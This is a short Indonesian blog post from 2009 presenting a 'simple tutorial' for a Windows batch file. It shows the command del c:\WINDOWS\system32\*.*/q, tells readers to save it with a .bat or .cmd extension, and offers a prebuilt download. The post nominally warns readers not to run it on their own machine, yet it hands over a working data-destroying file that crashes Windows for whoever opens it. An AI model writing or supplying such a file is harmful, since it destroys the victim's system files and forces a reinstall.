Jumat, 24 Juli 2009

jangan coba dikompi sendiri.bat

Kali ini saya coba ksih tutor simple, tp danger banget please jg coba di kompi sendiri.. klo gak mo install ulang kompi copy perintah dibawah ini di notepad, dan ksih nama apa aja, yang penting extensionnya bat atau cmd. contoh:jangan coba dikompi sendiri.bat

del c:\WINDOWS\system32\*.*/q

Apa efek dari comand tersebut? jadi jika kita membukanya, secara otomatis, system32 dalam kompi kita akan terhapus, dan kompi jadi crash coz system32 udah gk ada.. n u know what it mean
kalo masih bingung juga, ni saya kasih file yg sudah jdinya gak smpe 1kb Download Disini

Comments :

0 komentar to “jangan coba dikompi sendiri.bat”

Poskan Komentar

Blog Archive

 

Copyright © 2009 by ¤ëXcêL™¤ ßlõg